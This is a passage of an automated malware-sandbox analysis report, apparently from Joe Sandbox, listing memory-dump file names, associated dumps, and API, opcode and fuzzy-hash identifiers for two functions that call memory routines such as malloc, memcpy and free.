                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Valuemallocmemcpystrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2332725481-0
                                                                                                                                                                                                                          • Opcode ID: 90bd46e8e4b80a84e178155d48dd2ee85f2ecc2732715ae181558b40d313d250
                                                                                                                                                                                                                          • Instruction ID: e88bea8112d22613ed99f8c3dea35be1ec8f558f1d98004385a495c7f9564372
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90bd46e8e4b80a84e178155d48dd2ee85f2ecc2732715ae181558b40d313d250
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 900128B1E012909BE710B73A9D04E567AACEF82259B130129EC18C7A21E770E805C2E7
                                                                                                                                                                                                                          Function 6C481EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                          • Opcode ID: eb6980ff63f7418b59a053bccab6031837ab5df54200871fcb502bc07e3f4ea8
                                                                                                                                                                                                                          • Instruction ID: 8fadb46bb95f33f37450bc0e64b947a621f7e139353adc2e5b8383532bc84104
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb6980ff63f7418b59a053bccab6031837ab5df54200871fcb502bc07e3f4ea8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0E9B17015016BEB00EB6ADC89E27736CEF45195B040439ED1DC7B00D726F51187F5